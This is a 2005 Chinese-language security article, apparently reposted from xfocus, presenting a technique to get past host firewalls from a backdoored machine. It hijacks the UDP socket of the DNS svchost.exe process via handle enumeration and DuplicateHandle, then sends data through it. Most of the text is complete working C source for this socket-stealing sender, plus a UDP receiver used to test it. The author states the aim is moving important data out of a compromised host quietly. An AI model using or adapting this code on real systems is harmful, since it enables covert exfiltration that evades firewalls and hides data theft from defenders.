| 
		    
		    
		      
                       创建时间:2005-04-13 更新时间:2005-04-13 文章属性:原创 文章提交:suei8423 (suei8423_at_163.com)
  一种新的穿透防火墙的数据传输技术
  Author : ZwelL Email  : zwell@sohu.com Date   : 2005.4.12
  使用该技术背景: 在目标主机安放后门,需要将数据传输出去,同时数据很重要,动作不能太大.其他情况"严重"不推荐使用该技术(后面我会讲到为什么).
      针对目前防火墙的一些情况,如果自己的进程开一个端口(甚至是新建套接字)肯定被拦.相反,有一点我们也很清楚:被防火墙验证的进程在传送数据时永远不会被拦.所以,我的思路很简单: 将其他进程中允许数据传输的套接字句柄拿为已用.过程如下:
  1. 找出目标进程 2. 找出SOCKET句柄 2. 用DuplicateHandle()函数将其SOCKET转换为能被自己使用. 3. 用转换后的SOCKET进行数据传输
      上面的过程写的很简单,但是实际实现起来还是存在一些问题(后面再做讨论).而且从上面的实现方法也 可以看出一些不爽的地方:在目标进程的SOCKET不能是TCP,因为TCP的句柄已经跟外面建立了连接,所以只能是UDP. 针对不同系统不同进程我们很难定位一个稳定的进程SOCKET.
      看到上面这些,你有点丧气了对不对,哈哈. 再想一想,其实我们有一条真正的通罗马的"黄金大道".
      我们知道只要一台计算机连上了网络,那么有一种数据传输是肯定不会被拦截的,那就是DNS.你能想像域名解析数据都被 拦了造成的结果吗? 嘿嘿, 既然这个是永远不会被拦的, 而且它又是UDP传输, 我们就拿他开刀...
  下面是通过直接控制DNS进程(其实也就是svchost.exe,不过对应用户名是NETWORK SERVICE)进行数据传输的例子. 编程中出现了很多问题,比方说获取svchost对应用户名时没有权限(但是能够操作LOCAL SERVICE),在句柄值为0x2c时进行getsockname时会停止运行等等. 具体解决方法请细看注释部分...
  /*++
    Made By ZwelL   zwell@sohu.com   2005.4.12 --*/
  #include <winsock2.h> #include <stdio.h> #include <wtsapi32.h>
  #pragma comment(lib, "ws2_32") #pragma comment(lib, "wtsapi32")
  #define NT_SUCCESS(status)          ((NTSTATUS)(status)>=0) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
  typedef LONG    NTSTATUS;
  typedef struct _SYSTEM_HANDLE_INFORMATION {     ULONG            ProcessId;     UCHAR            ObjectTypeNumber;     UCHAR            Flags;     USHORT            Handle;     PVOID            Object;     ACCESS_MASK        GrantedAccess; } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
  typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
  ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;
  BOOL LocateNtdllEntry ( void ) {     BOOL    ret         = FALSE;     char    NTDLL_DLL[] = "ntdll.dll";     HMODULE ntdll_dll   = NULL;
 
      if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )     {         printf( "GetModuleHandle() failed");         return( FALSE );     }     if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, "ZwQuerySystemInformation" ) ) )     {         goto LocateNtdllEntry_exit;     }     ret = TRUE;
  LocateNtdllEntry_exit:
      if ( FALSE == ret )     {         printf( "GetProcAddress() failed");     }     ntdll_dll = NULL;     return( ret ); }
 
  /*++ This routine is used to get a process's username from it's SID --*/ BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName) {     // sanity checks and default value     if (pUserSid == NULL)         return false;     strcpy(szUserName, "?");
      SID_NAME_USE   snu;     TCHAR          szUser[_MAX_PATH];     DWORD          chUser = _MAX_PATH;     PDWORD         pcchUser = &chUser;      TCHAR          szDomain[_MAX_PATH];     DWORD          chDomain = _MAX_PATH;     PDWORD         pcchDomain = &chDomain;
      // Retrieve user name and domain name based on user's SID.     if (         ::LookupAccountSid(         NULL,          pUserSid,          szUser,          pcchUser,          szDomain,          pcchDomain,          &snu         )         )     {         wsprintf(szUserName, "%s", szUser);     }     else     {         return false;     }
      return true; }  
 
  /*++
  This routine is used to get the DNS process's Id    Here, I use WTSEnumerateProcesses to get process user Sid,  and then get the process user name. Beacause as it's a "NETWORK SERVICE",  we cann't use OpenProcessToken to catch the DNS process's token information, even if we has the privilege in catching the SYSTEM's.
  --*/ DWORD GetDNSProcessId() {     PWTS_PROCESS_INFO pProcessInfo = NULL;     DWORD             ProcessCount = 0;     char              szUserName[255];     DWORD              Id = -1;
      if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))     {         // dump each process description         for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++)         {
              if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 )             {                 GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);                 if( strcmp(szUserName, "NETWORK SERVICE") == 0)                 {                     Id = pProcessInfo[CurrentProcess].ProcessId;                     break;                 }             }         }
          WTSFreeMemory(pProcessInfo);     }
      return Id; }
 
  /*++ This doesn't work as we know, sign... but you can use the routine for other useing... --*/ /* BOOL GetProcessUserFromId(char *szAccountName, DWORD PID) {     HANDLE hProcess = NULL,              hAccessToken = NULL;     TCHAR InfoBuffer[1000], szDomainName[200];     PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;     DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;     SID_NAME_USE snu;
      hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);     if(hProcess == NULL)     {         printf("OpenProcess wrong");         CloseHandle(hProcess);         return false;     }
      if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))     {         printf("OpenProcessToken wrong:%08x", GetLastError());         return false;     }
      GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,         1000, &dwInfoBufferSize);
      LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,         &dwAccountSize,szDomainName, &dwDomainSize, &snu);
      if(hProcess)         CloseHandle(hProcess);     if(hAccessToken)         CloseHandle(hAccessToken);     return true; }*/
 
  /*++ Now, it is the most important stuff... ^_^ --*/ SOCKET GetSocketFromId (DWORD PID) {     NTSTATUS                     status;     PVOID                        buf   = NULL;     ULONG                        size  = 1;     ULONG                        NumOfHandle = 0;     ULONG                        i;     PSYSTEM_HANDLE_INFORMATION    h_info  = NULL;     HANDLE    sock = NULL;     DWORD    n;
      buf=malloc(0x1000);     if(buf == NULL)     {         printf("malloc wrong\n");         return NULL;     }     status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );     if(STATUS_INFO_LENGTH_MISMATCH == status)     {         free(buf);         buf=malloc(n);         if(buf == NULL)         {             printf("malloc wrong\n");             return NULL;         }         status = ZwQuerySystemInformation( 0x10, buf, n, NULL);     }     else     {         printf("ZwQuerySystemInformation wrong\n");         return NULL;     }
      NumOfHandle = *(ULONG*)buf;
      h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);
      for(i = 0; i<NumOfHandle ;i++)     {         try         {             if( ( h_info[i].ProcessId == PID )  && ( h_info[i].ObjectTypeNumber == 0x1c )                  && (h_info[i].Handle!=0x2c)    // I don't know why if the Handle equal to 0x2c, in my test, it stops at getsockname()                                             // So I jump over this situation...                                              // May be it's different in your system,                  ) //wind2000 is 0x1a             {                 //printf("Handle:0x%x Type:%08x\n",h_info[i].Handle, h_info[i].ObjectTypeNumber);                 if( 0 == DuplicateHandle(                     OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID),                      (HANDLE)h_info[i].Handle,                      GetCurrentProcess(),                      &sock,                      STANDARD_RIGHTS_REQUIRED,                      true,                      DUPLICATE_SAME_ACCESS)                     )                 {                     printf("DuplicateHandle wrong:%8x", GetLastError());                     continue;                 }
                  //printf("DuplicateHandle ok\n");                 sockaddr_in name = {0};                 name.sin_family = AF_INET;                 int namelen = sizeof(sockaddr_in);                 getsockname( (SOCKET)sock, (sockaddr*)&name, &namelen );                 //printf("PORT=%5d\n",    ntohs( name.sin_port ));                  if(ntohs(name.sin_port)>0)    // if port > 0, then we can use it                     break;             }         }         catch(...)         {             continue;         }     }
      if ( buf != NULL )     {         free( buf );     }     return (SOCKET)sock; }
 
  /*++ This is not required... --*/ BOOL EnablePrivilege (PCSTR name) {     HANDLE hToken;     BOOL rv;
      TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };     LookupPrivilegeValue (         0,         name,         &priv.Privileges[0].Luid         );
      priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
      OpenProcessToken(         GetCurrentProcess (),         TOKEN_ADJUST_PRIVILEGES,         &hToken         );
      AdjustTokenPrivileges (         hToken,         FALSE,         &priv,         sizeof priv,         0,         0         );
      rv = GetLastError () == ERROR_SUCCESS;
      CloseHandle (hToken);     return rv; }
  void main()  {     WSADATA wsaData;     char    testbuf[255];     SOCKET    sock;     sockaddr_in RecvAddr;
      int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);     if (iResult != NO_ERROR)         printf("Error at WSAStartup()\n");
      if(!LocateNtdllEntry())         return;
      if(!EnablePrivilege (SE_DEBUG_NAME))     {         printf("EnablePrivilege wrong\n");         return;     }
      sock = GetSocketFromId(GetDNSProcessId());     if( sock==NULL)     {         printf("GetSocketFromId wrong\n");         return;     }
      //Change there value...     RecvAddr.sin_family = AF_INET;     RecvAddr.sin_port = htons(5555);      RecvAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
      if(SOCKET_ERROR == sendto(sock,              "test",              5,              0,              (SOCKADDR *) &RecvAddr,              sizeof(RecvAddr)))     {         printf("sendto wrong:%d\n", WSAGetLastError());     }     else     {         printf("send ok... Have fun, right? ^_^\n");     }          getchar();
      //WSACleanup();     return; }
 
 
  很早以前我就有这个想法了,只是一直没有去实现.在上面的代码中, 因为要找出DNS进程句柄,而svchost.exe又有多个,所以以用户名来进行判断,本来是用OpenProcessToken, 但是怎么也不行,所以换个方法.用到了wtsapi32库函数.
  再用下面的代码测试:
 
  /*++ UdpReceiver --*/ #include <stdio.h> #include "winsock2.h"
  #pragma comment(lib, "ws2_32")
  void main()  {   WSADATA wsaData;   SOCKET RecvSocket;   sockaddr_in RecvAddr;   int Port = 5555;   char RecvBuf[1024];   int  BufLen = 1024;   sockaddr_in SenderAddr;   int SenderAddrSize = sizeof(SenderAddr);
    //-----------------------------------------------   // Initialize Winsock   WSAStartup(MAKEWORD(2,2), &wsaData);
    //-----------------------------------------------   // Create a receiver socket to receive datagrams   RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    //-----------------------------------------------   // Bind the socket to any address and the specified port.   RecvAddr.sin_family = AF_INET;   RecvAddr.sin_port = htons(Port);   RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY);
    bind(RecvSocket, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr));
    //-----------------------------------------------   // Call the recvfrom function to receive datagrams   // on the bound socket.   printf("Receiving datagrams...\n");   while(1)   {     recvfrom(RecvSocket,          RecvBuf,          BufLen,          0,          (SOCKADDR *)&SenderAddr,          &SenderAddrSize);     printf("%s\n", RecvBuf);   }
    //-----------------------------------------------   // Close the socket when finished receiving datagrams   printf("Finished receiving. Closing socket.\n");   closesocket(RecvSocket);
    //-----------------------------------------------   // Clean up and exit.   printf("Exiting.\n");   WSACleanup();   return; }
 
  测试步骤: 1. 在一台机器上执行UdpReceiver, 2. 在安装防火墙的机器上执行第一个程序.
  有什么问题,希望大家可以交流交流...^_^ 
-- ※ 链接: http://www.xfocus.net/articles/200504/791.html ※ 链接: http://www.nsfocus.net/index.php?act=sec_doc&do=view&doc_id=959 
		      
		      
		      
		      
		      
		      
                      
		      
		        
		      
		     |